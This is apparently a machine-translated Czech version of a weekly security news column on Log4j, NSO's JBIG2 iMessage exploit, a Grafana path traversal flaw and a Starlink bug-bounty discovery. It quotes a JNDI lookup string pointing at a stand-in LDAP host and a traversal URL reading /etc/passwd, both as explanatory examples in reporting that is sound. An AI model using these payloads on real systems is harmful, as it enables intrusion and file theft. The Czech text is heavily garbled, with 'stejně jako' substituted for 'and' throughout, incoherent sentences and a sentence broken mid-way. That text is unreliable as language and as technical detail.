Obrovská novinky tohoto týdne je Log4j, lámání jen pár hodin stejně pozdě, které mají být zahrnuty do minulého týdne sloupci. lidé jsou již s dotazem, zda se jedná o nejzávažnější zranitelnost vůbec, stejně jako to vypadá, jako by to alespoň v chodu. Chyba byla vůbec první nalezený bezpečnostních expertů v Alibaba, kteří oznámených Apache této vady na 24. listopadu. Cloudflare vytáhl svá data, stejně jako objevili důkazy o zranitelnosti ve volné přírodě již v 1. prosince. Tyto rané příklady jsou velmi řídké, stejně jako extrémně cílené, stačí, aby se mi otázku, zda tomu tak nebylo vědci, kteří byli součástí předběžného zveřejnění dělá další studii, která má problém. Bez ohledu na to, 9. prosince, Twitter individuální tweetnul podrobnosti o zranitelnosti, jakož i bezpečnost se rozpoutalo peklo. devět minut po pípání, Cloudflare pila pokus o zneužití opět, stejně jako do osmi hodin, že se zabývají 20,000 využít pokusy za minutu.
To je časová osa, ale co se děje s exploit, stejně jako důvod, proč je to tak špatné? Za prvé, zranitelný svazek je Log4j, je protokolování knihovna pro Javu. Umožňuje procesy získat log zpráv, kde se požadavek, aby šel, ale se spoustou zvony, stejně jako píšťaly ceně. jedna z těchto funkcí je podpora pro JNDI, je srozumitelný problém zabezpečení v Javě. Požadavek JNDI může vést k deserializace útoku, kde se příchozí datový tok zlomyslně deformované, nechová když je rozšířen zpět do objektu. To nebylo myšleno pro tyto JNDI je vyhledávání, které mají být prováděny přes internet, ale nebylo explicitní zkontrolujte, zda toto chování, takže tady jsme.
Konečný myšlenka je, že pokud si můžete vyvolat log komponovat s log4j který obsahuje $ {JNDI: LDAP: //example.com/a}, můžete spustit libovolný kód na tomto stroji. Výzkumní pracovníci, stejně jako zločinci již přišli s inovativními metodami zvládnout, že stejně jako je řetězec v prohlížeči-agent, nebo velmi křestní jméno. Ano, je to návrat bit Bobby Tables.Log4j 2.16.0. 2.15.0 obsahovala částečnou opravu, ale nebyl zcela zbavit problému. Aktualizovaný Java má rovněž změněn výchozí nastavení, které poskytují částečné zmírnění. Nicméně jsme s největší pravděpodobností ještě neviděli konec této dosud.
NSO stejně jako CPU Emulated v PDF
Kdyby to byl někdo jiný než Google práci Zero vypráví tento příběh, bych foukané ho jako chudý zařízení spiknutí Hollywoodu. Tato chyba zabezpečení je v aplikaci iOS iMessage, stejně jako přesně tak, jak to zvládá GIF údajů, které ve skutečnosti obsahují data ve formátu PDF. PDF soubory jsou pružné, mírně řečeno. jednou z možných stylů kódování je JBIG2, černá, stejně jako bílé kodek komprimace od roku 2000. Součástí kodeku je schopnost používat logické operátory AND, OR, XOR, stejně jako XNOR představují drobné rozdíly mezi lisovaných bloků. Přetečení celé číslo v dekompresní kódu umožňuje mnohem více paměti, aby se zamyslel platné výstup pro dekompresi, což znamená, že dekompresní kód může spustit tyto operátory Booleovská na tomto přídavné paměti.
A teď co dostanete, když máte velké množství paměti, stejně jako ty čtyři provozovatelé? Turing celkem CPU, samozřejmě. Ano, výzkumníci u skupiny NBÚ skutečně vyvinula on-line CPU v rutině PDF dekódování, stejně jako využívat tuto platformu pro start jejich sandbox útěk. Je to šílené, neuvěřitelné, stejně jako brilantní. [Poznámka redakce: i špatná skupina NSO je v podstatě zlo.]
Grafana Cesta Traversal
Vizualizace platforma Grafana právě nedávno opravena závažný problém, CVE-2021-43798. Tato chyba zabezpečení umožňuje pro cesty průchod přes složek plugin. Tak například, /public/plugins/alertlist/../../../../../../../../etc/passwd vrátí passwd dat ze serveru Linux. Aktualizace odstranění problému byl propuštěn na 7. prosince. Tato chyba byla opravdu 0-day po dobu několika dní, jak to bylo diskutováno na 3. veřejně, aby vývojářů Grafana však neznámý. kontrolovat svou posmrtně pro detaily.
Starlink
A konečně, mám originální výzkumnou studii na krytu. Můžete být obeznámeni s mou prací pokrývající satelit webový systém Starlink. část impulsu pro koupi, stejně jako udržování Starlink bylo udělat bezpečnostní výzkumnou studii na platformě, stejně jako, že cíl se nakonec narodil nějaké ovoce – až do výše na $ 4800 štědrosti. Tady je ten příběh.
Mám nedaleké kamarádem, který také využívá Starlink, stejně jako na 7. prosince, jsme zjistili, že jsme byli oba přidělena veřejně sledovatelná adresy IPv4. přesně tak, jak se Starlink je směrování práce mezi účastníky? Byla by webový provoz odeslaný z mé sítě k němu směřovat přímo na satelitu, nebo by každý paket musí odrazit satelitu, s SpaceX je pozemní stanicí, zpět do ptáka, stejně jako pak konečně zpátky ke mně? Traceroute je skvělý nástroj, stejně jako to reagovala na otázku:
traceroute na 98.97.92.x (98.97.92.x), 30 chmele max, 46 bajtů pakety
1 customer.dllstxx1.pop.starlinkisp.net (98.97.80.1) 25.830 ms 24.020 ms 23.082 ms
2 172.16.248.6 (172.16.248.6) 27,783 ms 23.973 ms 27.363 ms
3 172.16.248.21 (172.16.248.21) 23,728 ms 26.880 ms 28.299 ms
4 undefined.hostname.localhost (98.97.92.x) 59.220 ms 51.474 ms 51.877 ms
Jsme nechápali, co přesně každý hop byl však počet směrování, stejně jako latence každý dělá to relativně odstranit, že náš webový provoz se děje s pozemní stanicí. Nicméně je tu něco divného této traceroute. Měli jste area to? 172.16.x.y je osobní síť, v souladu s RFC1918. Je pravda, že se ukáže v traceroute prostředků, které má OpenWRT router, stejně jako zařízení Starlink účinně směrování z mého počítače na tuto adresu. teď jsem zjistil, takové věci, než na síti jiný ISP. pochopení, že by to mohlo být zajímavé, představil jsem nmap stejně jako naskenovaný osobní IP adresy, které objevil v traceroute. Bingo.
172.16.248.6 řádně uzamčena však 172.16.248.21 ukázal otevřené porty. Jmenovitě porty 179, 9100, 9101, stejně jako 50051. Nmap věřil 179 byl BGP, který zněl asi vpravo. Nicméně zbytek z nich? Telnet. Byl jsem poměrně pozitivní, že žádný z nich byly opravdu telnet služby, ale je to skvělý začátek, když se snaží zjistit neznámou službu. To nebyl výjimkou. Porty 9100 stejně jako 9101 mi řekl, že jsem udělal špatný požadavek, házení chyby 400S. Ach, byly služby HTTP! Tahání jak v internetovém prohlížeči mi poskytl výstup ladění, který vypadal, že je ze serveru Python baňky.
To poslední port 50051, bylo zajímavé. Jediná služba bych mohl zjistit, že byl běžně používán došlo Google gRPC, Dálkové řízení telefonát protokol a. Grpc_cli přišel vhod ověřit, že to, co jsem našel. bohužel odraz byl zakázán, což znamená, že služba odmítla výčet příkazy, které podporovány. Mapování jakýkoli typ příkazů bude muset házet velké množství dat v tomto přístavu.
V tomto bodě jsem se začal ptát, co přesně kus hardwaru jsem mluvil s. To dělalo BGP, bylo zevnitř sítě Starlink je, stejně jako můj web provoz byl směrování s ním. Může to být satelit? s největší pravděpodobností není, nicméně Starlink bug bounty je zcela odstranit, co by mělo přijít příště. Za žádných okolností by výzkumník dělat on-line testování na satelitu nebo jiné zásadní infrastruktury. Tušil jsem, že mluvím k části svého směrování infrastruktury, s největší pravděpodobností na pozemní stanici v Dallasu. Ať tak či onak, strkat stejně obtížné, stejně jako lámání něco bylo odsuzováno, a tak jsem se skládají do zpřístupnění na to, co jsem našel.
Starlink inženýři měli porty uzavřen do dvanácti hodin po zprávě, stejně jako mě požádal, abych překontrolovat, zda jejich roztřídit. jistý dost, když jsem mohl ještě ping osobní IP adresy, žádné porty byly otevřeny. tady je místo, kde musím úvěrovou historií kluci, které běží SpaceX je Starlink bug bounty. Mohli nazval tento jednoduchý info odhalení, zaplatil několik set dolarů, stejně jako to nazval jeden den. Místo toho, oni si našli čas, aby prošetřila, stejně jako ověřit, zda jsem skutečně našel otevřenou gRPC portu, stejně jako pak upustil bombu, že šlo o neověřený koncový bod. Objevování vsítil předběžnou cenu $ 3,800, plus odměna $ 1,000 za souhrnnou zprávu, stejně jako ne shazovat jejich online systémy. Jako můj kamarád regionální napůl žertem řečeno, že je to hodně peněz pro běh Nmap.
Ano, tam byl trochu štěstí zapojených integrován s celou velkou předchozí zkušenost s síťových vtípků. Primární stánek s jídlem by mělo být, že výzkum v oblasti bezpečnosti Studie nemusí vždy být mimořádně náročné zranitelnost, jakož i využití vývoj. Nemusíte vyvíjet Turing-kompletní systém ve formátu PDF. Někdy je to jen IP, jakož i skenování portů, integrované s vytrvalostí, jakož i trochu štěstí. Ve skutečnosti, pokud má váš ISP Bug Bounty, můžete zkusit zapojit stroj Linux přímo do modemu, stejně jako skenování osobní rozsah IP adres. měj oči otevřené. Jste stejně dobře se může objevit něco zajímavého.